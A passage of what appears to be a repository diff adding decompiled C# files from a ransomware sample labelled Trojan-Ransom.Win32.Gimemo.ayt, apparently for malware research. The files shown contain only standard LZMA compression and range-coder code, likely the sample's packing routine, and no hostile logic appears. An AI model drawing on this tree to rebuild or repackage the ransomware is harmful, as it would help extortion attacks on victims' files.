uint num = 8;
return this.m_Choice2.Decode(rangeDecoder) != 0U ? num + 8U + this.m_HighCoder.Decode(rangeDecoder) : num + this.m_MidCoder[(IntPtr) posState].Decode(rangeDecoder);
}
}
private class LiteralDecoder
{
private Decoder.LiteralDecoder.Decoder2[] m_Coders;
private int m_NumPrevBits;
private int m_NumPosBits;
private uint m_PosMask;
public void Create(int numPosBits, int numPrevBits)
{
if (this.m_Coders != null && this.m_NumPrevBits == numPrevBits && this.m_NumPosBits == numPosBits)
return;
this.m_NumPosBits = numPosBits;
this.m_PosMask = (uint) ((1 << numPosBits) - 1);
this.m_NumPrevBits = numPrevBits;
uint length = (uint) (1 << this.m_NumPrevBits + this.m_NumPosBits);
this.m_Coders = new Decoder.LiteralDecoder.Decoder2[(IntPtr) length];
for (uint index = 0; index < length; ++index)
this.m_Coders[(IntPtr) index].Create();
}
public void Init()
{
uint num = (uint) (1 << this.m_NumPrevBits + this.m_NumPosBits);
for (uint index = 0; index < num; ++index)
this.m_Coders[(IntPtr) index].Init();
}
private uint GetState(uint pos, byte prevByte) => (uint) ((((int) pos & (int) this.m_PosMask) << this.m_NumPrevBits) + ((int) prevByte >> 8 - this.m_NumPrevBits));
public byte DecodeNormal(SevenZip.Compression.RangeCoder.Decoder rangeDecoder, uint pos, byte prevByte) => this.m_Coders[(IntPtr) this.GetState(pos, prevByte)].DecodeNormal(rangeDecoder);
public byte DecodeWithMatchByte(
SevenZip.Compression.RangeCoder.Decoder rangeDecoder,
uint pos,
byte prevByte,
byte matchByte)
{
return this.m_Coders[(IntPtr) this.GetState(pos, prevByte)].DecodeWithMatchByte(rangeDecoder, matchByte);
}
private struct Decoder2
{
private BitDecoder[] m_Decoders;
public void Create() => this.m_Decoders = new BitDecoder[768];
public void Init()
{
for (int index = 0; index < 768; ++index)
this.m_Decoders[index].Init();
}
public byte DecodeNormal(SevenZip.Compression.RangeCoder.Decoder rangeDecoder)
{
uint index = 1;
do
{
index = index << 1 | this.m_Decoders[(IntPtr) index].Decode(rangeDecoder);
}
while (index < 256U);
return (byte) index;
}
public byte DecodeWithMatchByte(SevenZip.Compression.RangeCoder.Decoder rangeDecoder, byte matchByte)
{
uint index = 1;
do
{
uint num1 = (uint) ((int) matchByte >> 7 & 1);
matchByte <<= 1;
uint num2 = this.m_Decoders[(IntPtr) ((uint) (1 + (int) num1 << 8) + index)].Decode(rangeDecoder);
index = index << 1 | num2;
if ((int) num1 != (int) num2)
{
while (index < 256U)
index = index << 1 | this.m_Decoders[(IntPtr) index].Decode(rangeDecoder);
break;
}
}
while (index < 256U);
return (byte) index;
}
}
}
}
}
MSIL/Trojan-Ransom/Win32/G/Trojan-Ransom.Win32.Gimemo.ayt-7cb020d260d835f80919399a58563918f73757689e39ba851e89cc00a05535da/Compression/LZMA/Encoder.cs
+1329
View File
File diff suppressed because it is too large Load Diff
MSIL/Trojan-Ransom/Win32/G/Trojan-Ransom.Win32.Gimemo.ayt-7cb020d260d835f80919399a58563918f73757689e39ba851e89cc00a05535da/Compression/LZMA/SevenZipHelper.cs
+76
View File
@@ -0,0 +1,76 @@
// Decompiled with JetBrains decompiler
// Type: SevenZip.Compression.LZMA.SevenZipHelper
// Assembly: crypted, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 316F25AB-9DC5-41B1-B1CB-0BB9D97AEA6A
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Ransom.Win32.Gimemo.ayt-7cb020d260d835f80919399a58563918f73757689e39ba851e89cc00a05535da.exe
using System;
using System.IO;
namespace SevenZip.Compression.LZMA
{
public static class SevenZipHelper
{
private static int dictionary = 8388608;
private static bool eos = false;
private static CoderPropID[] propIDs = new CoderPropID[8]
{
CoderPropID.DictionarySize,
CoderPropID.PosStateBits,
CoderPropID.LitContextBits,
CoderPropID.LitPosBits,
CoderPropID.Algorithm,
CoderPropID.NumFastBytes,
CoderPropID.MatchFinder,
CoderPropID.EndMarker
};
private static object[] properties = new object[8]
{
(object) SevenZipHelper.dictionary,
(object) 2,
(object) 3,
(object) 0,
(object) 2,
(object) 128,
(object) "bt4",
(object) SevenZipHelper.eos
};
public static byte[] Compress(byte[] inputBytes)
{
MemoryStream inStream = new MemoryStream(inputBytes);
MemoryStream outStream = new MemoryStream();
Encoder encoder = new Encoder();
encoder.SetCoderProperties(SevenZipHelper.propIDs, SevenZipHelper.properties);
encoder.WriteCoderProperties((Stream) outStream);
long length = inStream.Length;
for (int index = 0; index < 8; ++index)
outStream.WriteByte((byte) (length >> 8 * index));
encoder.Code((Stream) inStream, (Stream) outStream, -1L, -1L, (ICodeProgress) null);
return outStream.ToArray();
}
public static byte[] Decompress(byte[] inputBytes)
{
MemoryStream inStream = new MemoryStream(inputBytes);
Decoder decoder = new Decoder();
inStream.Seek(0L, SeekOrigin.Begin);
MemoryStream outStream = new MemoryStream();
byte[] numArray = new byte[5];
if (inStream.Read(numArray, 0, 5) != 5)
throw new Exception("input .lzma is too short");
long outSize = 0;
for (int index = 0; index < 8; ++index)
{
int num = inStream.ReadByte();
if (num < 0)
throw new Exception("Can't Read 1");
outSize |= (long) (byte) num << 8 * index;
}
decoder.SetDecoderProperties(numArray);
long inSize = inStream.Length - inStream.Position;
decoder.Code((Stream) inStream, (Stream) outStream, inSize, outSize, (ICodeProgress) null);
return outStream.ToArray();
}
}
}
MSIL/Trojan-Ransom/Win32/G/Trojan-Ransom.Win32.Gimemo.ayt-7cb020d260d835f80919399a58563918f73757689e39ba851e89cc00a05535da/Compression/RangeCoder/BitDecoder.cs
+51
View File
@@ -0,0 +1,51 @@
// Decompiled with JetBrains decompiler
// Type: SevenZip.Compression.RangeCoder.BitDecoder
// Assembly: crypted, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 316F25AB-9DC5-41B1-B1CB-0BB9D97AEA6A
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Ransom.Win32.Gimemo.ayt-7cb020d260d835f80919399a58563918f73757689e39ba851e89cc00a05535da.exe
namespace SevenZip.Compression.RangeCoder
{
internal struct BitDecoder
{
public const int kNumBitModelTotalBits = 11;
public const uint kBitModelTotal = 2048;
private const int kNumMoveBits = 5;
private uint Prob;
public void UpdateModel(int numMoveBits, uint symbol)
{
if (symbol == 0U)
this.Prob += 2048U - this.Prob >> numMoveBits;
else
this.Prob -= this.Prob >> numMoveBits;
}
public void Init() => this.Prob = 1024U;
public uint Decode(Decoder rangeDecoder)
{
uint num = (rangeDecoder.Range >> 11) * this.Prob;
if (rangeDecoder.Code < num)
{
rangeDecoder.Range = num;
this.Prob += 2048U - this.Prob >> 5;
if (rangeDecoder.Range < 16777216U)
{
rangeDecoder.Code = rangeDecoder.Code << 8 | (uint) (byte) rangeDecoder.Stream.ReadByte();
rangeDecoder.Range <<= 8;
}
return 0;
}
rangeDecoder.Range -= num;
rangeDecoder.Code -= num;
this.Prob -= this.Prob >> 5;
if (rangeDecoder.Range < 16777216U)
{
rangeDecoder.Code = rangeDecoder.Code << 8 | (uint) (byte) rangeDecoder.Stream.ReadByte();
rangeDecoder.Range <<= 8;
}
return 1;
}
}
}
MSIL/Trojan-Ransom/Win32/G/Trojan-Ransom.Win32.Gimemo.ayt-7cb020d260d835f80919399a58563918f73757689e39ba851e89cc00a05535da/Compression/RangeCoder/BitEncoder.cs
+68
View File
@@ -0,0 +1,68 @@
// Decompiled with JetBrains decompiler
// Type: SevenZip.Compression.RangeCoder.BitEncoder
// Assembly: crypted, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 316F25AB-9DC5-41B1-B1CB-0BB9D97AEA6A
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Ransom.Win32.Gimemo.ayt-7cb020d260d835f80919399a58563918f73757689e39ba851e89cc00a05535da.exe
using System;
namespace SevenZip.Compression.RangeCoder
{
internal struct BitEncoder
{
public const int kNumBitModelTotalBits = 11;
public const uint kBitModelTotal = 2048;
private const int kNumMoveBits = 5;
private const int kNumMoveReducingBits = 2;
public const int kNumBitPriceShiftBits = 6;
private uint Prob;
private static uint[] ProbPrices = new uint[new IntPtr(512)];
public void Init() => this.Prob = 1024U;
public void UpdateModel(uint symbol)
{
if (symbol == 0U)
this.Prob += 2048U - this.Prob >> 5;
else
this.Prob -= this.Prob >> 5;
}
public void Encode(Encoder encoder, uint symbol)
{
uint num = (encoder.Range >> 11) * this.Prob;
if (symbol == 0U)
{
encoder.Range = num;
this.Prob += 2048U - this.Prob >> 5;
}
else
{
encoder.Low += (ulong) num;
encoder.Range -= num;
this.Prob -= this.Prob >> 5;
}
if (encoder.Range >= 16777216U)
return;
encoder.Range <<= 8;
encoder.ShiftLow();
}
static BitEncoder()
{
for (int index1 = 8; index1 >= 0; --index1)
{
uint num1 = (uint) (1 << 9 - index1 - 1);
uint num2 = (uint) (1 << 9 - index1);
for (uint index2 = num1; index2 < num2; ++index2)
BitEncoder.ProbPrices[(IntPtr) index2] = (uint) (index1 << 6) + ((uint) ((int) num2 - (int) index2 << 6) >> 9 - index1 - 1);
}
}
public uint GetPrice(uint symbol) => BitEncoder.ProbPrices[(((long) (this.Prob - symbol) ^ (long) -(int) symbol) & 2047L) >> 2];
public uint GetPrice0() => BitEncoder.ProbPrices[(IntPtr) (this.Prob >> 2)];
public uint GetPrice1() => BitEncoder.ProbPrices[(IntPtr) (2048U - this.Prob >> 2)];
}
}
MSIL/Trojan-Ransom/Win32/G/Trojan-Ransom.Win32.Gimemo.ayt-7cb020d260d835f80919399a58563918f73757689e39ba851e89cc00a05535da/Compression/RangeCoder/BitTreeDecoder.cs
+66
View File
@@ -0,0 +1,66 @@
// Decompiled with JetBrains decompiler
// Type: SevenZip.Compression.RangeCoder.BitTreeDecoder
// Assembly: crypted, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 316F25AB-9DC5-41B1-B1CB-0BB9D97AEA6A
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Ransom.Win32.Gimemo.ayt-7cb020d260d835f80919399a58563918f73757689e39ba851e89cc00a05535da.exe
using System;
namespace SevenZip.Compression.RangeCoder
{
internal struct BitTreeDecoder
{
private BitDecoder[] Models;
private int NumBitLevels;
public BitTreeDecoder(int numBitLevels)
{
this.NumBitLevels = numBitLevels;
this.Models = new BitDecoder[1 << numBitLevels];
}
public void Init()
{
for (uint index = 1; (long) index < (long) (1 << this.NumBitLevels); ++index)
this.Models[(IntPtr) index].Init();
}
public uint Decode(Decoder rangeDecoder)
{
uint index = 1;
for (int numBitLevels = this.NumBitLevels; numBitLevels > 0; --numBitLevels)
index = (index << 1) + this.Models[(IntPtr) index].Decode(rangeDecoder);
return index - (uint) (1 << this.NumBitLevels);
}
public uint ReverseDecode(Decoder rangeDecoder)
{
uint index1 = 1;
uint num1 = 0;
for (int index2 = 0; index2 < this.NumBitLevels; ++index2)
{
uint num2 = this.Models[(IntPtr) index1].Decode(rangeDecoder);
index1 = (index1 << 1) + num2;
num1 |= num2 << index2;
}
return num1;
}
public static uint ReverseDecode(
BitDecoder[] Models,
uint startIndex,
Decoder rangeDecoder,
int NumBitLevels)
{
uint num1 = 1;
uint num2 = 0;
for (int index = 0; index < NumBitLevels; ++index)
{
uint num3 = Models[(IntPtr) (startIndex + num1)].Decode(rangeDecoder);
num1 = (num1 << 1) + num3;
num2 |= num3 << index;
}
return num2;
}
}
}

Some files were not shown because too many files have changed in this diff Show More